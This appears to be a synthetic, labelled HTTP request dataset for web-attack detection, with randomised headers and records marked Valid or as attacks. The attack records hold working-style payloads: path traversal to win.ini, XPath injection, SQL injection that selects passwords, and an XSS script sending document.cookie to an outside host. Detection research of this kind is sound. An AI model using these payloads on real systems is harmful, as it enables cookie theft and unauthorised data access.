Via: 9.2 www.rNn2nhfs.gif, FTP/1.8 100.54.15.173
Transfer-Encoding: deflate
Upgrade: Edteeo/1.3, lamel/3.5
Warning: 822 www.doik.shtml:3 "omlq" "Sat, 28 Aug 04 02:17:50 UTC"
X-Forwarded-For: 165.15.81.251
X-Serial-Number: 161043
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 673
Start - Id: 45122
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: www.hO4w.com:80
Connection: vhiinw1E
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.5, gzip;q=0.9, gzip
Accept-Language: hus8asw-dge93;q=0.9, e5sgoeuF-AS6esre6, hdsxc-Cratta, smaEstsg-Dlroaely;q=0.7, Ew6a-nsr;q=0.1
Cache-Control: taLhda='S'
Client-ip: 223.196.253.50
Cookie: mjmgraye=9rEgAJn-LTl;nmnooz=e8;eiUlYpwqrMcei=7Eeey7g9t@m%zw;G2grfigoStessd=eqb9MW;8BWq=94884083;sd=havingtmochae
Cookie2: $Version="35"
Date: Tue, 29 Mar 05 14:52:00 CET
ETag: W/"M6@cazmkokCWUTxYz"
Expect: 100-continue
From: lmfapce@abHed.be
If-Modified-Since: Fri, 24 Aug 07 20:57:26 GMT
If-Unmodified-Since: Fri, 24 Dec 04 09:38:44 UTC
If-Match: *
If-None-Match: "UmH3kYZ5rR1lfwb4.D"
If-Range: ".MDWDXDHh10@Wyw6WWTA"
Max-Forwards: 90
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Basic QXNVbjpuZXNoZQ==
Range: -3,456-488022
Referer: /llogme/hi4jiYa/totjrmyn/ieyure.fgf
TE: gzip,chunked;q=0.0
Trailer: Host
User-Agent: vJ.GcaCpI http://www.haTiqb.gov
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0464x327
Via: 6.6 www.tktth.jpeg:12
Transfer-Encoding: identity
Upgrade: srsd/2.9, nNisSb/2.9, eTj/8.9
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: -------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45122
Start - Id: 2669
class: Valid
GET /6NeqesyhSetptthtobd/Cac9y/a.nx_6B7/9tCAbJt/kP/r2w3DJ6Y.4divi/v7altltbvtRk/eheecqnaxletfncucyaa/gduygafwdbesaifgut/iepeumbvbBnnaisE/u-71C.y6sHQ_Hcmx.css? HTTP/1.1
Host: 195.159.35.8:85
Connection: close
Accept: application/x-tar;q=0.8
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: is='dd8tl1u'
Client-ip: 97.1.7.203
Cookie: vGf9hzosct=iyrntg;8MUF=mstqahs5i+2;due32eidtSe=rtevalewgetkE?msaeht&tchildIt ;3swa=be;tiOscriptU3FPf=4407217;ncvSTk@g@@W=scy=a
Cookie2: $Version="737"
Date: Sun, 25 Jun 06 12:32:24 CET
ETag: W/"YgfCl574zFZDDyBiItIN"
Expect: erRtfmbi=aeptu
From: ovamHuqy@MlywzI.fr
If-Modified-Since: Thu, 29 Sep 05 17:33:23 CET
If-Unmodified-Since: Thu, 19 Apr 07 19:50:00 GMT
If-Match: "zoHVEEB9ADe_gYTS8"
If-None-Match: "TF4KwJxOowwYStDfl"
If-Range: *
Max-Forwards: 007
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM OWRlTmFlb25Bb2hjZXRybXdmbG5laWcxZUNyaWxpb2U=
Range: -23,-6679
Referer: /8i08/ywcaaieu/sdlntitc/dhura.gif
TE: deflate,chunked;q=0.0,chunked
Trailer: Accept-Charset
User-Agent: etrmer/3.9
UA-CPU: StrongARM
UA-Disp: 6089,3163,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 486x934
Via: 1.8 www.aredte.htm, 1.6 www.2LdtrUEa.jpg, ttfk0Q/5.2 www.ahcHEs.jpeg
Transfer-Encoding: identity
Upgrade: dubal/9.7, rce/1.2
Warning: 749 www.okXda0.jpeg:63 "nQde" 
X-Forwarded-For: 11.110.78.15
X-Serial-Number: 8136074594585
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2669
Start - Id: 14045
class: Valid
GET /xEMXMxqf_EBUsVzJWh.jpg? HTTP/1.0
Host: 28.172.42.103
Connection: keep-alive
Accept: text/plain;q=0.5, video/quicktime;q=0.6, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 120.124.48.202
Cookie: YPFtIaZDoor=7389236637
Cookie2: $Version="0"
Date: Mon, 01 Mar 10 08:37:59 UTC
ETag: "6WGNd7XqmZApSWn2UYO"
Expect: lml8osg
From: cenEc@hezob.fr
If-Modified-Since: Sun, 06 Nov 05 15:27:48 UTC
If-Unmodified-Since: Sun, 10 Oct 04 05:39:17 GMT
If-Match: *
If-None-Match: "tOUAlnpWTT05DQ8t"
If-Range: Fri, 22 Aug 08 06:15:40 UTC
Max-Forwards: 068
MIME-Version: 3.7
Pragma: oyen=9ih
Proxy-Authorization: NTLM OG9zZXlhOHNlZWxlaXRDNGpydGFFb05sNUUxdHI0YWRUczhuOHVJbGh5
Authorization: sean Tzoozn=1EpDo
Range: 477582-,-394214
Referer: /retaa/r1tEeepe/Ra1efd/indtvi9/acaoe.asmx
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/5.9 (X11; U; Unix 9.7; ao-fu; rv:7.5.0) Gecko/34176310
UA-CPU: x86
UA-Disp: 091,777,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8443x481
Via: 9dcen/7.3 www.smTdnred.jpeg:475
Transfer-Encoding: deflate
Upgrade: iQr/6.2
Warning: 863 20.114.173.199 "iMuoaneTo" 
X-Forwarded-For: 241.125.208.47
X-Serial-Number: 0043438224132828242
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14045
Start - Id: 23144
class: Valid
GET /yV2KYJy.MDC/2Onpxzole5ofe/eEids/aT/eOWdH.sh?NjxzUYS=kFjhb&varHNqboot.ini2Amail_b=eXX4.N HTTP/1.1
Host: 167.39.79.74
Connection: keep-alive
Accept: text/*;q=0.6, application/*;q=0.8, text/xml;q=0.4
Accept-Charset: iso-8859-2;q=0.3
Accept-Encoding: identity, compress, identity;q=0.7, identity;q=0.7, identity
Accept-Language: 7hl-d;q=0.0, ehors6aE-i
Cache-Control: max-age=3250
Client-ip: 222.192.91.32
Cookie: tsIen3kL=ss-;ctahe=l]
Cookie2: $Version="891"
Date: Mon, 27 Sep 04 03:22:19 UTC
ETag: W/"KBEj96GC2vdsgciB"
Expect: 100-continue
From: 1lhqp@irmkvcm8.it
If-Modified-Since: Tue, 27 Dec 05 08:41:48 CET
If-Unmodified-Since: Tue, 04 Dec 07 19:50:07 GMT
If-Match: *
If-None-Match: "Z5Dq-7GwLLabwO3ru"
If-Range: Mon, 10 Aug 09 15:24:05 CET
Max-Forwards: 84
MIME-Version: 0.1
Pragma: toceeQ='S'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM TmlhcmR5cndkeW4yRWVtbnByeWh1YmtoZGhub2x0cnVkdHRm
Range: 566-769965,-745
Referer: /saJg/aewh/r9iE/rueci.nsf
TE: trailers
Trailer: Referer
User-Agent: Mozilla/6.8 (Machintosh; U; PPC 2.9; ae-na; rv:6.8.0) Gecko/83587145
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 558x894
Via: FTP/0.5 www.Eqvhn1m.htm:68301, 8.4 154.173.58.214, HTTP/4.9 175.80.136.133
Transfer-Encoding: identity
Upgrade: 1tc/8.5, saair/2.1, so6/1.5, uuaZi/5.6, n0di/4.9
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23144
Start - Id: 48956
class: XPathInjection
GET /qg08dsEsi8ihqzuim/Yerosbemstnqe/aNZs6aJoZ/bENaoeUy/VZXgXc/bhIgSe/1jTFcpNp/iuCAEotflrh/3EFL.69ks/dFHwPeuNpvqgDd.I/cotRnlmrou.gif?utqarytphnlmh=dp%27+++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++%27eami%27+%3D++++%27&3F7vi5xwinclude=owE7il7afn&binS81oc=y2 HTTP/1.1
Host: 245.21.198.111
Connection: close
Accept: audio/x-wav;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 170.112.198.15
Cookie: wtEPyy=6413396;hQxUS9eOxg=iw9
Cookie2: $Version="71"
Date: Tue, 27 Jan 09 17:26:03 GMT
ETag: "FUkp6cY6gug6IFvU"
Expect: 100-continue
From: aaee5oT@0lekntq.de
If-Modified-Since: Fri, 27 Apr 07 16:30:38 GMT
If-Unmodified-Since: Sun, 04 Jul 04 10:21:07 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Apr 05 08:44:32 GMT
Max-Forwards: 68
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: vtaa iiuEo=syio
Range: 5-
Referer: /taQp/atjsasdh/eoanyE.js
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: tahh2s (e0lWd1; yDXeNUor; e242kn-kV)
UA-CPU: Sparc
UA-Disp: 705,827,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: HTTP/3.9 www.m81gt.png, aced/6.8 www.9etfm.css, HTTP/3.5 193.6.8.71
Transfer-Encoding: compress
Upgrade: t32c/4.7, tre/8.0
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 58.153.30.65
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48956
Start - Id: 20456
class: Valid
GET /a7i7P4kTy.hV.htm?G.KNwgetlognbm@z=77000&8Tt=Hoopmnfrnl&IfBCUC4PmochaWdK=ia&u524esix=4184394465&dTrslestiH=xtermtN&nodapoDXTaMmr=wFkr&enrrr2Rtacrotre=srwenhi6&erse2bpSsh=T+ibetweeniprocessing-instructionuhdss%5BT%7Cs0&EMquyvnTnetes=0115&VevalJpsyFPp=63l0EssArm&oenopuaeSysp=nochcdm&zowlydS=ttn+ae&Rl9oyowxesw=5 HTTP/1.0
Host: 153.148.189.97
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: eilt8et='prO'
Client-ip: 83.158.227.172
Cookie: mrohn2fe=zrey5phH<gOaj;i8oonheuruee=l6siwdEntaAtna;_gWp=jrDAmvALb9A2aecs;31ao=5549366;o9eIeu=aRdnrzXGRU
Cookie2: $Version="2"
Date: Thu, 05 Mar 09 22:48:33 GMT
ETag: W/"ULyg1rb0SVstg9wIa"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Wed, 23 Jun 04 03:07:36 GMT
If-Unmodified-Since: Thu, 01 Oct 09 09:56:11 GMT
If-Match: "Ape1uD.VNpIvv@jVSt.N"
If-None-Match: "lJHxTm2iO0WT@ne-5m"
If-Range: Wed, 16 Mar 05 09:31:08 CET
Max-Forwards: 4
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic aWJQamVScjpybmVncw==
Authorization: P0dt khrge=hywi9
Range: -896,61-724379,-171
Referer: http://www.lit3uta.biz/intatel/ndtmeoa/wp4uit/tyu8ivaC/gpqenYLt.nsf
TE: trailers,trailers,deflate;q=0.3
Trailer: Authorization
User-Agent: Mozilla/0.6 (compatible; MSIE 2.6; Win98; asotsravon; drpnC; etez5it7)
UA-CPU: 68000
UA-Disp: 635,2020,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6158x619
Via: FTP/2.9 142.228.6.121
Transfer-Encoding: compress
Upgrade: zosEe/8.8, bsan/1.2, a3f/0.3, ioths/1.6, ill/1.5
Warning: 434 www.6rh0.tiff "tawl4aoerems8gnd" 
X-Forwarded-For: 69.102.148.135
X-Serial-Number: 4599369837031891295
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20456
Start - Id: 31841
class: Valid
GET /s8DzkM4j6q/af1F3b5hzdnRD/JceHBBJtcs_xMf/winO-AG01i/Ondrnt/vC/alpEsolmsdb7ezwriima/oN/ettEhonrgfose/rhHt1/snr-ARaMtFpe-/huDudWea.asmx?lfzustlto44n=Iwerle+&Nsl3=7792&YgIjoDR=yIQ0icI&1Ua=011&rrclpsetp=pbZ+r%5C%2B9t1passthruatUgrpdg7&5gb.GE=3sxtJuoQxpA HTTP/1.1
Host: 214.112.204.19
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1257
Accept-Encoding: *
Accept-Language: aho-rsewhno3, jaewe-D;q=0.3, ojhrl9-oed1st, ieq2r-l
Cache-Control: min-fresh=39
Client-ip: 111.91.155.175
Cookie: MNep=9973692
Cookie2: $Version="944"
Date: Wed, 11 May 05 15:42:06 GMT
ETag: W/"gde8Dk70UHJfStlf"
Expect: 100-continue
From: tte0c@9tOsemgp.be
If-Modified-Since: Mon, 29 Mar 04 06:12:32 UTC
If-Unmodified-Since: Wed, 09 Aug 06 04:20:04 UTC
If-Match: *
If-None-Match: "JpVHuOypr5xz7R7G"
If-Range: Sun, 16 Jan 05 14:40:40 UTC
Max-Forwards: 1578
MIME-Version: 4.6
Pragma: t=sTyarbyo
Proxy-Authorization: NTLM TzB5dXJPcklpZG5lZXR0YzJ0OXczZXNucTh0bXRhZW5Rcm5tYTJ0ZHN0eHVpaQ==
Authorization: Digest qop=auth
Range: -86
Referer: http://www.n0relso.be/9fyEm/bvec/m3iittN/mRtcE/nf5w.asmx
TE: gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/9.1 (compatible; MSIE 6.1; WinNT; untoegm)
UA-CPU: MIPS
UA-Disp: 753,4459,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2241x014
Via: 3.4 24.177.238.90
Transfer-Encoding: gzip
Upgrade: emhps/3.5, Steh/4.0, aieted/4.2, iro9te/2.8, are/6.4
Warning: 195 19.136.88.173 "i5lytaiwejOlo" 
X-Forwarded-For: 236.36.151.129
X-Serial-Number: 69375200108238652611
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31841
Start - Id: 606
class: Valid
GET /WscriptZ83bsyCR/pu/8v2sY/RguTwegeeErq/e9aD/rn.bin?kftootsaih=rtm&radn=oox8mtgasSfuhvyesu&ea7eutwigrr=48311787&pgY0QP9AuP5V=efamouvmooieidz8dr&evdEtds0=h%3EistE%26dthionfe&Jcat0ZedD=taawnNb4iklwcn7&dhvbob=91365703&6UNP=oprVV&er5bsomdd=+shf&Nuoshyrg=74058&nl1i3dnbr9rxl=7212&At5=img%3Bc&dbetcrmi=O%2Bsn+n4includernl&eRr=t2-6x HTTP/1.1
Host: 87.94.247.238
Connection: close
Accept: text/*, audio/*
Accept-Charset: cp-932;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=031
Client-ip: 202.215.122.171
Cookie: 3tn=47;niyllmAsered=egoquibbu;rDsHru9qv=saeh;qAPxTu=izM-77Ba00I
Cookie2: $Version="098"
Date: Thu, 04 Nov 04 22:48:55 CET
ETag: W/"BDkJjvQd6BFG588I3@mt"
Expect: 100-continue
From: i7wh@s1dUih1sA.it
If-Modified-Since: Wed, 13 Aug 08 10:24:56 CET
If-Unmodified-Since: Sat, 15 Nov 08 22:14:15 GMT
If-Match: "I3BZijjz3nn03@Nm"
If-None-Match: *
If-Range: "AUVECCivcvUKRSARI."
Max-Forwards: 0635
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM bXV0c2Vvb2JyZGVXcmdzbnB0ZnR0Zm9oWXJzbnN4Z3M=
Authorization: Basic dWppYWFydzpuc3NleWg=
Range: 00-
Referer: http://talaazle.biz/dsTv/oetaw.jsp
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/3.4 (Machintosh; U; PPC Mac OS X 4.7; er-sn; rv:4.7.3) Gecko/12559341
UA-CPU: Sparc
UA-Disp: 2226,321,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 412x961
Via: FTP/7.1 108.88.217.252, Omias/6.4 139.162.66.205, 0.6 www.Efunslun.html
Transfer-Encoding: gzip
Upgrade: ns7o/1.7, rd8q5/4.3
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 54.55.101.225
X-Serial-Number: 541499677250739
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 606
Start - Id: 48471
class: XPathInjection
GET /rZS82WEj-.GI/tica3lnao/iP6cN@window.openupdatenJ.M/niaa0rtn/s3-idJYXRG5i3GN3/9nlqae.dll?ranElhn3=03700&6thih5DeidFe=225471&ujhohdhysnsewe=leiot%5D9wlshi&cSuEWK-copy0=9901897946&uAatt=155&IRmAuetKodptT=p%28+%7Cliaopt%24crloO%7E HTTP/1.0
Host: 230.10.250.135:46816
Connection: close
Accept: application/*;q=0.2
Accept-Charset: x-mac-chinesesimp;q=0.2, iso-8859-6, iso-8859-2;q=0.7, x-mac-ce
Accept-Encoding: deflate, gzip, deflate, deflate;q=0.6, compress
Accept-Language: *
Cache-Control: max-age=83
Client-ip: 193.145.9.182
Cookie: su=Ek']    |  P |     //user[    name/text(    )  =   'ch;hobsratd=r2nwisZaaon6iGi;rie1=4482158
Cookie2: $Version="1"
Date: Mon, 30 Oct 06 02:37:55 GMT
ETag: W/"FKKTnXS@BEreAWkUH-iT"
Expect: 100-continue
From: duez@roBpoamoii.uk
If-Modified-Since: Sun, 04 Jun 06 17:45:19 GMT
If-Unmodified-Since: Tue, 02 Oct 07 03:57:48 CET
If-Match: *
If-None-Match: "rX9Uu33fGVma-MUUs0"
If-Range: Mon, 26 Apr 04 15:49:11 UTC
Max-Forwards: 703
Pragma: pmn=t0rfg
Proxy-Authorization: 7vto beGCh6=td7mup
Authorization: Basic aG9oaHI6YXMyTg==
Range: 6835-4942,7596-,27202-
Referer: /stxma7.aspx
TE: chunked,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.1 (X11; U; SunOS sun4u 3.8; he-gD; rv:3.3.0) Gecko/27626662
UA-CPU: Sparc
UA-Disp: 4596,7427,16
UA-Color: color8
Via: 2.4 www.t3egd.png
Transfer-Encoding: gzip
Upgrade: eeet1/3.4, has/9.2, C8nt2/1.3, wNsh/5.4
Warning: 216 www.neaatkhh.jpeg:6 "hacliae" 
X-Serial-Number: 60467521583413658
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48471
Start - Id: 28542
class: Valid
GET /ih0sVycary.jpeg?Vpdiqlhfnro=r&iaoEnl=F8u2&nh7rhnngnhli=tAlcCiIat&sodb5u7fsfWY=esVgWyAL HTTP/1.1
Host: www.insa0q2hfa.net
Connection: close
Accept: text/*;q=0.6
Accept-Charset: iso-8859-9;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 81.119.248.8
Cookie: t6y=pq cds;5nn8unita5naw=adit
Cookie2: $Version="420"
Date: Sun, 11 Jan 04 13:41:51 CET
ETag: W/"d8l7kAzDFiLNc-Wyw3GV"
Expect: qndes
From: tuezrt@nexhlht5a.it
If-Modified-Since: Sun, 02 Nov 08 02:35:25 CET
If-Unmodified-Since: Mon, 29 Aug 05 11:57:43 CET
If-Match: *
If-None-Match: "6BSRBGQdCE9kRZ3"
If-Range: Sun, 24 Jan 10 18:26:49 GMT
Max-Forwards: 5
MIME-Version: 8.0
Pragma: eot=ufyzufa
Proxy-Authorization: Basic aWpzZ2Zud3A6Z1NlbG56
Authorization: Digest nonce
Range: 6-267184,-1,5-7119
Referer: /as9bthar/ltoibNh/eqlhtt.cfm
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: adsp1og
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6545x8948
Via: 0to3g/2.2 191.224.75.147
Transfer-Encoding: 5ints
Upgrade: 8omcl/7.6
Warning: 013 38.161.125.54 "rsGoemitnia" 
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 37650652134780806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28542
Start - Id: 47879
class: XSS
GET /urse7wnsgeo6lu/xHfOIohHg8i/iZ_-4VwEQnVxR9IERTf/eetemnckhiixrkeSi/a2ZNl8ci4FEwY6Q.aspx?mzobiEsEcpiEU=%26%3Cscript+++%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.asolllge.com%2Fcgi-bin%2Fntrorestta.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E&XtX=o7t&lyyr3h5sKaos=11977&varNa.=29&Njasctshi=4076224&tlagFczqeenere=979892200&aicnhlcwn=793&mchsb=6169&dirmRtIu0S=huKsystem%5C HTTP/1.1
Host: www.ilrdt.net
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: euc-kr, windows-1254;q=0.1, x-mac-arabic;q=0.2
Accept-Encoding: *
Accept-Language: ly2ss-en;q=0.3, 2eja6rNp-ketzEu;q=0.7
Cache-Control: no-transform
Client-ip: 85.234.191.196
Cookie: 4ae=|dnxp_motlocationbtkn\rey;heenwht4=cYp
Cookie2: $Version="24"
Date: Mon, 06 Jun 05 08:37:08 UTC
ETag: "g@pHW7UV-x7nc7Q"
Expect: lrhe
From: loGrTtE@euoweraEr.be
If-Modified-Since: Wed, 26 Jul 06 03:59:46 GMT
If-Unmodified-Since: Sat, 20 Dec 08 08:35:49 CET
If-Match: *
If-None-Match: *
If-Range: "M9@GgC3h9YJ5aOB"
Max-Forwards: 475
MIME-Version: 0.4
Pragma: bwtB='vorb'
Proxy-Authorization: Basic aWlsNm86a2h0eQ==
Authorization: Basic N2FuMDplZWZXczRi
Range: 064-,-6198,422476-
Referer: http://www.naeraes.st/upeorchd/mnofT/eicB/lohor/Ay5u.fgf
TE: trailers,chunked,gzip;q=0.9
Trailer: Accept
User-Agent: Mozilla/3.4 (compatible; Konqueror/6.1; Mac OS X; oegttIGc2a; sEzom; 6np0s58drn)
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: HTTP/0.0 47.6.191.167, FTP/2.8 72.223.118.70, 3.1 59.64.29.217
Transfer-Encoding: compress
Upgrade: dglC/5.9, mee/7.3, oitlI/6.9, acmtu/7.6
Warning: 417 www.nmwhs.jpg "hngvi5nseoeon" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47879
Start - Id: 1796
class: Valid
GET /m6ccerttbttje/9T/ayzyB7xjxTYbsOe/60r/iMYmnm414/OGWmwinntP/lxQ/lhnuaaerIia1i1/uATa2ngr1Rle1luscd.bin?ses6ew=mby0%25styleshutdownyek-lnvar&ihiattro=nuna5q27newdtai&cgaatolbfeera=924759&i5PrnsiT=wo+e&etcFECY5@YUyZ3=f8eoneoqt&oetnvu0h1=P29s&TnJT1h-=dpassthru&soo=895974492&9aetraussrio=har9x&1ioNxm=-%3Cpo+mor+m&seseXenAjaloWDa=u839losA&sh=uf&yes=e14htet4siorEt HTTP/1.0
Host: www.gsyrrdhr.fr:80
Connection: close
Accept: text/plain;q=0.8
Accept-Charset: iso-8859-4;q=0.6, iso-8859-1
Accept-Encoding: *
Accept-Language: *
Cache-Control: tth5het='cafse'
Client-ip: 242.142.150.13
Cookie: Ciea0do=62988;ctyrgrlct=t;DdITvbscriptjyPhtaccesD0T=95;eflrioter1mh=a6Y04VHnjE6;apwde=18;rfenn92dejee=373
Cookie2: $Version="396"
Date: Sun, 23 Aug 09 17:28:26 UTC
ETag: W/"0l4b4EjQF@zOGq4rP"
Expect: 100-continue
From: afReCmmd@ea5oe.uk
If-Modified-Since: Mon, 03 Oct 05 08:43:15 UTC
If-Unmodified-Since: Thu, 24 Aug 06 06:21:05 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Dec 08 12:57:02 GMT
Max-Forwards: 101
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: puyR ypeoqttF=hne2i
Authorization: Basic Z3Z2aWk3ZDpodTZ0MGxy
Range: 9724-,33511-083617,2-
Referer: /65ott.cfm
TE: gzip;q=0.2,chunked
Trailer: Via
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 8.7; n4-ti; rv:2.4.0) Gecko/52277512
UA-CPU: x86
UA-Disp: 490,8525,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 912x237
Via: 9.9 127.105.1.206, 5.3 208.194.239.168:40111, FTP/3.1 215.179.182.146
Transfer-Encoding: identity
Upgrade: pa7r/0.7, 9lsi/0.4
Warning: 765 150.82.249.233 "hreidtUJea6i" "Mon, 21 Aug 06 09:03:29 CET"
X-Forwarded-For: 162.29.213.245
X-Serial-Number: 0392549
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1796
Start - Id: 41945
class: SqlInjection
GET /nhlo/cDxSJw/bwun6sd/8ieae/8oumhewnzOPojnmute/r6qtgvaenhd4kTdiawr0.mspx?liroisaxr=R9mOulFteUderc4wet&lr5mgsesmpst=tsmleenhfoa&LtLnmnm=%27union++select++PASSWORD+from++DBA_PASSWORD%3B--&soheep3clkm53w=442&gecoee5E3s=knLe%25ergroup+byc&XPSvh=41155412&fsnmkqxnomn=tk7ix9&eetlmmdaa5ena=5jnodez HTTP/1.1
Host: 224.93.152.166
Connection: close
Accept: image/jpeg;q=0.1, text/plain
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 228.114.106.80
Cookie: 6mrmSri=libmyeUo2tl3n=whereqhobjectm
Cookie2: $Version="26"
Date: Fri, 20 Jan 06 14:33:20 GMT
ETag: "STLwztEysXjjA5_mC8"
Expect: 100-continue
From: erpnsemv@5tAwdogn.st
If-Modified-Since: Tue, 13 Mar 07 17:49:21 GMT
If-Unmodified-Since: Fri, 31 Oct 08 18:00:20 GMT
If-Match: *
If-None-Match: "a6syYAo@f@MyVGOg"
If-Range: *
Max-Forwards: 8569
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: aies sesl=fkaciu
Authorization: Basic b2VkYWk6bzhhc3NoZ3M=
Range: 55660-
Referer: /tns3qtY/ieha/qbmmo/nPdo/sseeHtn.shtml
TE: trailers,trailers,chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: oAmwR8ieisp6aToneN
UA-CPU: x86
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 316x2725
Via: FTP/9.3 www.REtaaoll.html
Transfer-Encoding: oaio4
Upgrade: imn/2.9
Warning: 021 www.mcyot.gif "hrtenvrrnpri" 
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 41242078999326437
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41945
Start - Id: 45193
class: PathTransversal
GET /./? HTTP/1.1
Host: www.etEra.fr:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.0, x-mac-greek;q=0.5, x-mac-icelandic, windows-1257;q=0.0, x-mac-ce;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 30.124.242.244
Cookie: 1tiS=718;oi9toEotTuh=395;yAraSeeh=|g;ehlbaczsityapoi=h]3eus&E+;itehi=288758031
Cookie2: $Version="339"
Date: Sun, 07 Mar 04 13:57:28 CET
ETag: W/"5P7OUM98bOhr6Jn"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Tue, 21 Jun 05 09:31:28 GMT
If-Unmodified-Since: Thu, 10 Feb 05 09:44:14 CET
If-Match: "3rugntQ@XvByb0okNWhD"
If-None-Match: "wkW908nD@s64TjzHLTy"
If-Range: Sat, 30 Jul 05 12:00:22 CET
Max-Forwards: 8730
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: NTLM bGluZXNibG1hZmFxZ2hlcmNhcHR0QW9IaWk3YmF1bTNzc3Zz
Range: 338-,-31040,26925-
Referer: /Onoli0s.tar.gz
TE: gzip;q=0.1,chunked
Trailer: User-Agent
User-Agent: Mozilla/1.0 (X11; U; Linux i586 7.0; 3t-ts; rv:0.1.8) Gecko/41367778
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2083x0053
Via: 9.1 www.snohrto.html:8
Transfer-Encoding: compress
